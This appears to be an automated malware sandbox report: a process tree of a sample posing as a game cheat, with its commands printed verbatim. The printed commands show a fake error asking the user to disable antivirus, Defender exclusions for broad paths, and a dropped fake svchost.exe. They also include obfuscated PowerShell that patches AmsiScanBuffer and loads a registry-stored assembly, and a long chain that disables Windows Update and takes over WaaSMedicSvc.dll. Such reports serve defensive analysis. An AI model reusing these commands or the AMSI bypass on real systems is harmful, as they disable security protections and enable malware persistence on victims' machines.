PID 1384 wrote to memory of 3172	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 3172	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 2668	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 2668	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 2668	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 3968	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 3968	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 3968	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 4432 wrote to memory of 1300	4432	cmd.exe	powershell.exe
PID 4432 wrote to memory of 1300	4432	cmd.exe	powershell.exe
PID 4432 wrote to memory of 1300	4432	cmd.exe	powershell.exe
PID 4148 wrote to memory of 2768	4148	cmd.exe	powershell.exe
PID 4148 wrote to memory of 2768	4148	cmd.exe	powershell.exe
PID 4148 wrote to memory of 2768	4148	cmd.exe	powershell.exe
PID 1168 wrote to memory of 4340	1168	cmd.exe	svchost.exe
PID 1168 wrote to memory of 4340	1168	cmd.exe	svchost.exe
PID 3968 wrote to memory of 2104	3968	cmd.exe	windowshost.exe
PID 3968 wrote to memory of 2104	3968	cmd.exe	windowshost.exe
PID 3968 wrote to memory of 2104	3968	cmd.exe	windowshost.exe
PID 2668 wrote to memory of 1584	2668	cmd.exe	explorer.exe
PID 2668 wrote to memory of 1584	2668	cmd.exe	explorer.exe
PID 2668 wrote to memory of 1584	2668	cmd.exe	explorer.exe
PID 3172 wrote to memory of 2252	3172	cmd.exe	svchost.exe
PID 3172 wrote to memory of 2252	3172	cmd.exe	svchost.exe
PID 2104 wrote to memory of 3520	2104	windowshost.exe	sc.exe
PID 2104 wrote to memory of 3520	2104	windowshost.exe	sc.exe
PID 2104 wrote to memory of 3520	2104	windowshost.exe	sc.exe
PID 3520 wrote to memory of 1856	3520	WScript.exe	cmd.exe
PID 3520 wrote to memory of 1856	3520	WScript.exe	cmd.exe
PID 3520 wrote to memory of 1856	3520	WScript.exe	cmd.exe
PID 1856 wrote to memory of 912	1856	cmd.exe	cominto.exe
PID 1856 wrote to memory of 912	1856	cmd.exe	cominto.exe
PID 4148 wrote to memory of 1928	4148	cmd.exe	powershell.exe
PID 4148 wrote to memory of 1928	4148	cmd.exe	powershell.exe
PID 4148 wrote to memory of 1928	4148	cmd.exe	powershell.exe
PID 4340 wrote to memory of 964	4340	svchost.exe	conhost.exe
PID 4340 wrote to memory of 964	4340	svchost.exe	conhost.exe
PID 4340 wrote to memory of 964	4340	svchost.exe	conhost.exe
PID 2252 wrote to memory of 4548	2252	svchost.exe	conhost.exe
PID 2252 wrote to memory of 4548	2252	svchost.exe	conhost.exe
PID 2252 wrote to memory of 4548	2252	svchost.exe	conhost.exe
PID 964 wrote to memory of 4532	964	conhost.exe	cmd.exe
PID 964 wrote to memory of 4532	964	conhost.exe	cmd.exe
PID 4548 wrote to memory of 2536	4548	conhost.exe	powercfg.exe
PID 4548 wrote to memory of 2536	4548	conhost.exe	powercfg.exe
PID 4532 wrote to memory of 1176	4532	cmd.exe	powershell.exe
PID 4532 wrote to memory of 1176	4532	cmd.exe	powershell.exe
PID 2536 wrote to memory of 3976	2536	cmd.exe	powershell.exe
PID 2536 wrote to memory of 3976	2536	cmd.exe	powershell.exe
PID 4548 wrote to memory of 2492	4548	conhost.exe	cmd.exe
PID 4548 wrote to memory of 2492	4548	conhost.exe	cmd.exe
PID 4548 wrote to memory of 3172	4548	conhost.exe	cmd.exe
PID 4548 wrote to memory of 3172	4548	conhost.exe	cmd.exe
PID 4548 wrote to memory of 2220	4548	conhost.exe	powercfg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:584
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{74e60f7f-82db-452f-b5d2-8071ca161bff}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:760

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1184
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3212
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:VZXFYLeyBYxk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VbVaylTWkhyhcI,[Parameter(Position=1)][Type]$ojiDHclJxM)$eISNzJnMpls=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$eISNzJnMpls.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$VbVaylTWkhyhcI).SetImplementationFlags('Runtime,Managed');$eISNzJnMpls.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ojiDHclJxM,$VbVaylTWkhyhcI).SetImplementationFlags('Runtime,Managed');Write-Output $eISNzJnMpls.CreateType();}$MuNGNWmSwyAia=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oRdfZUrKUdIKqu=$MuNGNWmSwyAia.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rxenVSNfFXpedfldRCR=VZXFYLeyBYxk @([String])([IntPtr]);$YjerJNiDHJWrpznUGBRxPx=VZXFYLeyBYxk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SCfaJYBdQbL=$MuNGNWmSwyAia.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$fPYfSfyCDRFCuo=$oRdfZUrKUdIKqu.Invoke($Null,@([Object]$SCfaJYBdQbL,[Object]('Load'+'LibraryA')));$ynDTcuLeipawfdzhi=$oRdfZUrKUdIKqu.Invoke($Null,@([Object]$SCfaJYBdQbL,[Object]('Vir'+'tual'+'Pro'+'tect')));$qtSolFO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fPYfSfyCDRFCuo,$rxenVSNfFXpedfldRCR).Invoke('a'+'m'+'si.dll');$fEpHOsIZMJNZOzTBI=$oRdfZUrKUdIKqu.Invoke($Null,@([Object]$qtSolFO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$iOxEVIfMzX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ynDTcuLeipawfdzhi,$YjerJNiDHJWrpznUGBRxPx).Invoke($fEpHOsIZMJNZOzTBI,[uint32]8,4,[ref]$iOxEVIfMzX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$fEpHOsIZMJNZOzTBI,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ynDTcuLeipawfdzhi,$YjerJNiDHJWrpznUGBRxPx).Invoke($fEpHOsIZMJNZOzTBI,[uint32]8,0x20,[ref]$iOxEVIfMzX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2196
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4816
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JqhVKfZrpkaP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fNUmazMmrQMyGg,[Parameter(Position=1)][Type]$scCxEjwPcF)$KqDzDSMlGNz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$KqDzDSMlGNz.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$fNUmazMmrQMyGg).SetImplementationFlags('Runtime,Managed');$KqDzDSMlGNz.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$scCxEjwPcF,$fNUmazMmrQMyGg).SetImplementationFlags('Runtime,Managed');Write-Output $KqDzDSMlGNz.CreateType();}$ExMOfZAFEDaIa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$HcvQfcetTKIZYu=$ExMOfZAFEDaIa.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UmRhDOLJpHkOSeLkjRQ=JqhVKfZrpkaP @([String])([IntPtr]);$BqdweyTDsiBSfPeqwLiVjc=JqhVKfZrpkaP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WZSgrntmJOa=$ExMOfZAFEDaIa.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$kyWFxHyFxfoZQU=$HcvQfcetTKIZYu.Invoke($Null,@([Object]$WZSgrntmJOa,[Object]('Load'+'LibraryA')));$WrhAZMNXIdEclOnIA=$HcvQfcetTKIZYu.Invoke($Null,@([Object]$WZSgrntmJOa,[Object]('Vir'+'tual'+'Pro'+'tect')));$MAaVVpe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kyWFxHyFxfoZQU,$UmRhDOLJpHkOSeLkjRQ).Invoke('a'+'m'+'si.dll');$zTxkhFtLPLAbFzmEO=$HcvQfcetTKIZYu.Invoke($Null,@([Object]$MAaVVpe,[Object]('Ams'+'iSc'+'an'+'Buffer')));$YXvruHNoji=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WrhAZMNXIdEclOnIA,$BqdweyTDsiBSfPeqwLiVjc).Invoke($zTxkhFtLPLAbFzmEO,[uint32]8,4,[ref]$YXvruHNoji);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zTxkhFtLPLAbFzmEO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WrhAZMNXIdEclOnIA,$BqdweyTDsiBSfPeqwLiVjc).Invoke($zTxkhFtLPLAbFzmEO,[uint32]8,0x20,[ref]$YXvruHNoji);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1444

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1496
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2320

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2592

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2656

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3436

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3528
- C:\Users\Admin\AppData\Local\Temp\06293c3726a8b6029225668dcfb8c7e8.exe
  "C:\Users\Admin\AppData\Local\Temp\06293c3726a8b6029225668dcfb8c7e8.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1300
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4148
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2768
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1928
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1168
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      C:\Users\Admin\AppData\Local\Temp\svchost.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4340
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:964
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1176
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:4748
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2124
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:1616
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        7⤵
        Launches sc.exe
        
        PID:228
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        7⤵
        Launches sc.exe
        
        PID:4312
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:2056
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:4268
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:3024
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:3176
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        7⤵
        Launches sc.exe
        
        PID:2696
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:5216
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:5272
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:5360
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:5464
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:5540
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:5660
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:5756
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5852
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        7⤵
        
        PID:6116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        7⤵
        
        PID:5024
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        7⤵
        
        PID:2936
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        7⤵
        
        PID:1364
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        7⤵
        
        PID:4004
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        7⤵
        
        PID:228
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        7⤵
        
        PID:4676
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        7⤵
        
        PID:5292
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        7⤵
        
        PID:5416
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        7⤵
        
        PID:1108
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        7⤵
        
        PID:4600
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        7⤵
        
        PID:5360
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        7⤵
        
        PID:4384
      - C:\Windows\System32\cmd.exe
        
